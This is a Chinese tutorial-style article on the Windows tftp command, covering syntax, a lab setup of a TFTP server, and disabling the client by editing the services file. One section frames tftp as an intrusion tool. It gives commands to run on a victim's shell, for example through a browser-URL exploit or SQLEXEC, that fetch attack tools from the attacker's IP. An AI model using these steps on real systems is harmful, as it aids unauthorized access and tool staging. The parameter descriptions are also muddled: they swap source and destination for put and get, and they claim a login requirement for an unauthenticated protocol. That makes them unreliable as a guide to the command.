Tftp命令详解

Tftp命令详解  

概述:


        简单文件传输协议(TFTP)是用来传送文件的Internet软件程序,它使用起来比文件传输协议(FTP)简单,但是功能少。它通常是应用在无需用户鉴别和目录列表的情况下。TFTP使用用户数据报(UDP)而FTP使用传输控制协议(TCP)。TFTP在RFC 1350中进行了描述。

Tftp 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件。该命令只有在安装了 TCP/IP 协议后才可以使用。

格式:


具体格式为:  TFTP [-i] host [GET | PUT] source [destination] 
  参数解释

  -i指定二进制图像传送模式(也称为“八位字节”)。在二进制图像模式中,文件一个字节接一个字节地逐字移动。在传送二进制文件时使用该模式。

  如果省略了-i,文件将以ASCII模式传送。这是默认的传送模式,此模式将EOL字符转换为UNIX的回车符和个人计算机的回车符/换行符。在传送文本文件时应使用此模式。如果文件传送成功,将显示数据传输率。

  host指定本地或远程计算机。

  put将本地计算机上的文件destination传送到远程计算机上的文件source。

  get将远程计算机上的文件destination传送到本地计算机上的文件source。

  如果将本地计算机上的文件file-two传送到远程计算机上的文件file-one,要指定为put。如果将远程计算机上的文件file-two传送到远程计算机上的文件file-one,要指定为get。因为tftp协议不支持用户身份验证,所以用户必须登录,并且文件在远程计算机上必须可以写入。

  source指定要传送的文件。如果本地文件指定为-,则远程文件在stdout上打印出来(如果获取),或从stdin(如果放置)读取。

  destination指定将文件传送到的位置。如果省略了destination,将假定与source同名。

其他:

tftp,一个功能强大的ftp代替软件,它强大的ftp功能可以绕过主机的用户名和口令验证,绕过IPC$通道,直接COPY我们需要的文件,使用极其方便,下面是一些使用体会,写一点下来,分享给大家!

一、上传:

格式:tftp -i 现在你的IP get 源文件 盘符://路径//目标文件名

二、下载:

格式:tftp -i 对方的IP put 盘符:/路径/源文件名

用法和注意点:

1、tftp必须在本机上先运行起来,充当虚拟服务器的角色。

2、tftp在运行中不得断开连接。

3、要上传的文件必须和tftp在一个目录中。

4、文件的默认下载位置就是tftp目录。

5、tftp在上传的格式中,目标地址要用双//格开。

6、可以在任何对方的命令行使用tftp,如:跟在对方IP后的浏览器地址栏里(详细说明请参考U漏洞的贴子)、SQLEXEC的command输入行等等位置。

7、tftp默认属性是上传和下载的时候采用覆盖不提示的方式。

8、tftp上传的文件可能会加上只读属性,请上传完全毕后检阅

在Windows的操作系统中,有一个名为tftp的客户端,在入侵的过程中,可以利用它去上传一些攻击工具。这个服务原本是为了网络文件传输服务的。没想到却变成了一颗“定时炸弹”,看到还是要把它给请出去为宜。

操作过程:


  1.建立TFTP服务器

  为了弄清楚TFTP客户端究竟是如何工作的,我们可以首先建立了一个TFTP服务器,看看它到底能否真正实现文件传输。

  在Win2000系统所在分区的system32/DLLCACHE目录下找到一个名为“tftpd.exe”的文件,然后将tftpd.exe文件复制到system32目录中。注意:若无法找到“DLLCACHE”目录,可打开资源管理器,选择“工具/文件夹选项/查看”,将“隐藏所保护的系统文件”前复选框的勾选去除即可。

  在Win2000的Resource Kits(资源工具包)中找到工具instsrv.exe(如果没有可从此链接下载:http://home.njenet.net.cn/panhh/tools.zip,该压缩包内含instsrv.exe,tftpd.exe,tftp.exe),将它们复制到系统根目录或其它目录中。

  进入系统MS-DOS窗口,在系统提示符后输入“E:/instsrv.exe tftp E:/Windows/system32/tftpd.exe”(不含引号),敲回车键,即可出现服务添加成功的字样。继续在MS-DOS窗口中输入“net start tftp”,按回车键,启动TFTP服务。注意:tftpd.exe是TFTP服务器端程序,tftp.exe是客户端程序,这两者不可混淆。

  2.利用tftp客户端上传下载文件

        在MS-DOS窗口中输入“tftp -i 192.168.150.128 put ntlm.exe ntlm.exe”命令,其中“put”表示上传文件,命令中的IP地址为本地IP地址,“ntlm.exe”为自行选择的一个文件(也可以是D:\ntlm.exe,即本地的文件)。如果不出意外,便会看到传输成功的字样及字节数。同时在根目录中会出现了一个“tftpdroot”子目录,这便是在上传文件时系统自动创建的目录。

  而在MS-DOS窗口中输入“tftp -i 192.168.150.128 get install.exe”命令行,则可以下载服务器上的文件。

  3.禁用tftp客户端

  看到这里,也许会有不少朋友会说,把tftp这个客户端程序删除不就可以了吗?由于在Win2000操作系统中,“tftp.exe”是做为系统的关键程序而受到Windows File Protection(视窗文件保护)保护的,所以根本无法直接更改,那么到底该如何解决这个问题呢?

  打开“%systemroot%/system32/drivers/etc”目录,比如“C:/WINDOWS/system32/drivers/etc”,利用文本编辑工具打开其中名为“service”的文件,找到内容中所对应的“tftp”那一行。将“69/udp”替换成“0/udp”,保存并退出。

  当再次利用tftp客户端进行上传下载时,就会出现“ Connect request failed”这样的提示,这说明当前已经无法在命令行方式下进行tftp的文件传输,“定时炸弹”终于被安全拆除了。

  小知识:FTP大家都不会感到陌生,而TFTP则是Win2000操作系统中的一个服务,全称是Trivial File Transfer Protocol(简单文件传输协议),主要是可以将文件传输到正在运行TFTP服务的远程计算机或从正在运行TFTP服务的远程计算机传输文件。它可以看作是一个简化的FTP,与我们常见的FTP服务器相比,由于是系统自带的服务,使用起来比较方便,但由于没有用户权限管理功能,所以有安全隐患。

优缺点:


优点:
TFTP不像FTP会暴露身份,即用户名和密码;
使用语句简单。
缺点:
TFTP常用端口为69,因此通常会被防火墙拦截。

参考: http://masisi100.blog.163.com/blog/static/12776730220099208250444/

你可能感兴趣的:(windows,FTP服务器,System,工具,internet,文本编辑)